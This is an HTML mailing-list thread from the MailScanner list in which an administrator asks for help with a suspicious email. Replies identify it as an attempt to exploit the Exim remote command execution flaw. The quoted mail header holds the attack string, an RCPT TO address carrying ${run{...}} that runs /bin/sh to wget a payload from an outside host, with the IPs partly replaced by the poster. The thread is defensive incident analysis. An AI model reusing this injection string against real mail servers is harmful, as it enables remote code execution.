<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
</head>
<body text="#000000" bgcolor="#FFFFFF">
<pre class=" language-txt"><code class=" language-txt" style="white-space: pre-wrap;">Yes, i think you're right :-D
it looks very simular to this:
- If Exim was configured to recognize tags in the local part of the
recipient's address (via "local_part_suffix = +* : -*" for example),
then a remote attacker can simply reuse our local-exploitation method
with an RCPT TO "<b>balrog+${run{...}}@</b>localhost" (where "balrog" is the
name of a local user).</code></pre>
<br>
Source: <a class="moz-txt-link-freetext" href="https://www.exploit-db.com/exploits/46974">https://www.exploit-db.com/exploits/46974</a><br>
<br>
phueue...my mailscanner can live on...<br>
<br>
Thank you!<br>
<br>
<pre class="moz-signature" cols="72">Mit freundlichen Gruessen
H. Backhaus
Fink-Computer Systeme
Heggrabenstr. 9, 35435 Wettenberg
Email: <a class="moz-txt-link-abbreviated" href="mailto:heino.backhaus@fink-computer.de">heino.backhaus@fink-computer.de</a>
Web: <a class="moz-txt-link-abbreviated" href="http://www.fink-computer.de">www.fink-computer.de</a>
Fax: +49-641-98444638
Fon: +49-641-98444640
UST-ID: DE151040770
HRB: 2143 Gießen
GF: Fredi Fink
I was gratified to be able to answer promptly, and I did.
I said I didn't know.
Mark Twain
</pre>
<div class="moz-cite-prefix">Am 15.07.2019 um 13:16 schrieb Shawn
Iverson via MailScanner:<br>
</div>
<blockquote type="cite"
cite="mid:CABu_8z+7=DmqQ5Lz2dBqJKMz72odUMW1kwBDuqNY59V4p2M6XA@mail.gmail.com">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<div dir="ltr">Agreed.</div>
<br>
<div class="gmail_quote">
<div dir="ltr" class="gmail_attr">On Mon, Jul 15, 2019 at 7:14
AM Martin Hepworth <<a href="mailto:maxsec@gmail.com"
moz-do-not-send="true">maxsec@gmail.com</a>> wrote:<br>
</div>
<blockquote class="gmail_quote" style="margin:0px 0px 0px
0.8ex;border-left:1px solid rgb(204,204,204);padding-left:1ex">
<div>
<div dir="auto">Looks like an attempt at the Exim
vulnerability exploitation rather than mailscanner</div>
</div>
<div><br>
<div class="gmail_quote">
<div dir="ltr" class="gmail_attr">On Mon, 15 Jul 2019 at
11:59, Heino Backhaus <<a
href="mailto:heino.backhaus@fink-computer.de"
target="_blank" moz-do-not-send="true">heino.backhaus@fink-computer.de</a>>
wrote:<br>
</div>
<blockquote class="gmail_quote" style="margin:0px 0px 0px
0.8ex;border-left:1px solid
rgb(204,204,204);padding-left:1ex">
<div bgcolor="#FFFFFF"> Hallo List,<br>
<br>
i need some help analysing the following email, i
received last week.<br>
<br>
Mailwatch Mail-Metadata:<br>
<br>
Received: from <a href="http://sab.com"
target="_blank" moz-do-not-send="true">sab.com</a>
(unknown [46.22.132.94])<br>
by mailscanner.mydomain.local (Postfix) with SMTP
id D3F551005AD<br>
for <root+${run{x2fbinx2fsht-ctx22wgetx20<b>1.2.3.4</b>x2fsbzx2f<b>5.6.7.8</b><a
class="gmail-m_-4713894618235700781m_-5282560356877763242moz-txt-link-abbreviated"
href="mailto:x22%7D%7D@mailscanner.mydomain.local"
target="_blank" moz-do-not-send="true">x22}}@mailscanner.mydomain.local</a>>;
Thu, 11 Jul 2019 19:34:58 +0200 (CEST)<br>
Received: 1<br>
Received: 2<br>
Received: 3<br>
Received: 4<br>
Received: 5<br>
Received: 6<br>
Received: 7<br>
Received: 8<br>
Received: 9<br>
Received: 10<br>
Received: 11<br>
Received: 12<br>
Received: 13<br>
Received: 14<br>
Received: 15<br>
Received: 16<br>
Received: 17<br>
Received: 18<br>
Received: 19<br>
Received: 20<br>
Received: 21<br>
Received: 22<br>
Received: 23<br>
Received: 24<br>
Received: 25<br>
Received: 26<br>
Received: 27<br>
Received: 28<br>
Received: 29<br>
Received: 30<br>
Received: 31<br>
<br>
<br>
<br>
IP1: <b>199.204.214.40</b> changed to <b>1.2.3.4</b>
to disarm this...just in case...<br>
IP2: <b>87.138.227.107</b> changed to <b>5.6.7.8</b>
to disarm this...just in case...<br>
<br>
Versions:<br>
MailWatch Version: 1.2.9<br>
OS: Ubuntu 16.04.6 LTS (Xenial Xerus)<br>
Postfix Version: 3.1.0 <br>
MailScanner Version: 5.1.2<br>
ClamAV Version: 0.102.0-devel-20190715 <br>
SpamAssassin Version: 3.4.2 <br>
PHP Version: 5.6.40-8+ubuntu16.04.1+<a
href="http://deb.sury.org" target="_blank"
moz-do-not-send="true">deb.sury.org</a>+1<br>
MySQL Version: 5.7.26-0ubuntu0.16.04.1<br>
<br>
Can you help me to bring some light in this dark...<br>
<pre class="gmail-m_-4713894618235700781m_-5282560356877763242moz-signature" cols="72">--
Mit freundlichen Gruessen
H. Backhaus
Fink-Computer Systeme
<a href="https://www.google.com/maps/search/Heggrabenstr.+9,+35435+Wettenberg?entry=gmail&source=g" target="_blank" moz-do-not-send="true">Heggrabenstr. 9, 35435 Wettenberg</a>
Email: <a class="gmail-m_-4713894618235700781m_-5282560356877763242moz-txt-link-abbreviated" href="mailto:heino.backhaus@fink-computer.de" target="_blank" moz-do-not-send="true">heino.backhaus@fink-computer.de</a>
Web: <a class="gmail-m_-4713894618235700781m_-5282560356877763242moz-txt-link-abbreviated" href="http://www.fink-computer.de" target="_blank" moz-do-not-send="true">www.fink-computer.de</a>
Fax: +49-641-98444638
Fon: +49-641-98444640
UST-ID: DE151040770
HRB: 2143 Gießen
GF: Fredi Fink
I was gratified to be able to answer promptly, and I did.
I said I didn't know.
Mark Twain
</pre>
</div>
<div bgcolor="#FFFFFF"> <br>
--
<br>
Diese E-Mail wurde auf Viren und gefährliche Anhänge
<br>
durch
<a href="http://www.mailscanner.info/" target="_blank"
moz-do-not-send="true"><b>MailScanner</b></a>
untersucht und ist wahrscheinlich virenfrei.
</div>
<br>
<br>
-- <br>
MailScanner mailing list<br>
<a href="mailto:mailscanner@lists.mailscanner.info"
target="_blank" moz-do-not-send="true">mailscanner@lists.mailscanner.info</a><br>
<a
href="http://lists.mailscanner.info/mailman/listinfo/mailscanner"
rel="noreferrer" target="_blank"
moz-do-not-send="true">http://lists.mailscanner.info/mailman/listinfo/mailscanner</a><br>
<br>
</blockquote>
</div>
</div>
-- <br>
<div dir="ltr"
class="gmail-m_-4713894618235700781gmail_signature">-- <br>
Martin Hepworth, CISSP<br>
Oxford, UK</div>
<br>
<br>
-- <br>
MailScanner mailing list<br>
<a href="mailto:mailscanner@lists.mailscanner.info"
target="_blank" moz-do-not-send="true">mailscanner@lists.mailscanner.info</a><br>
<a
href="http://lists.mailscanner.info/mailman/listinfo/mailscanner"
rel="noreferrer" target="_blank" moz-do-not-send="true">http://lists.mailscanner.info/mailman/listinfo/mailscanner</a><br>
<br>
</blockquote>
</div>
<br clear="all">
<div><br>
</div>
-- <br>
<div dir="ltr" class="gmail_signature">
<div dir="ltr">
<div>
<div dir="ltr">
<div>
<div dir="ltr">
<div>
<div dir="ltr">
<div>
<div dir="ltr">
<div>
<div dir="ltr">
<div>
<div dir="ltr">
<div>
<div dir="ltr">
<div>
<div dir="ltr">
<div>
<div dir="ltr">
<div dir="ltr">
<div dir="ltr">Shawn
Iverson, CETL
<div>Director of
Technology</div>
<div>Rush County
Schools</div>
<div>765-932-3901
option 7</div>
<div><a
href="mailto:iversons@rushville.k12.in.us"
target="_blank"
moz-do-not-send="true">iversons@rushville.k12.in.us</a></div>
<div><br>
</div>
<div><img
src="https://docs.google.com/uc?export=download&id=0Bw5iD0ToYvs_Zkh4eEs3R01yWXc&revid=0Bw5iD0ToYvs_QWpBK2Y2ajJtYjhOMDRFekZwK2xOamk5Q3Y0PQ"
moz-do-not-send="true" width="89" height="96"><img
src="https://docs.google.com/uc?export=download&id=1aBrlQou4gjB04FY-twHN_0Dn3GHVNxqa&revid=0Bw5iD0ToYvs_RnQ0eDhHcm95WHBFdkNRbXhQRXpoYkR6SEEwPQ"
style="font-size:
12.8px;"
moz-do-not-send="true"><img
src="https://www.doe.in.gov/sites/default/files/cybersecurity/cybersecurity.png"
alt="Cybersecurity" moz-do-not-send="true" width="96" height="96"></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<br>
--
<br>
Diese E-Mail wurde auf Viren und gefährliche Anhänge
<br>
durch
<a href="http://www.mailscanner.info/" moz-do-not-send="true"><b>MailScanner</b></a>
untersucht und ist wahrscheinlich virenfrei.
<br>
<fieldset class="mimeAttachmentHeader"></fieldset>
<pre class="moz-quote-pre" wrap="">
</pre>
</blockquote>
<br>
<br />--
<br />Diese E-Mail wurde auf Viren und gefährliche Anhänge
<br />durch
<a href="http://www.mailscanner.info/"><b>MailScanner</b></a> untersucht und ist wahrscheinlich virenfrei.
</body>
</html>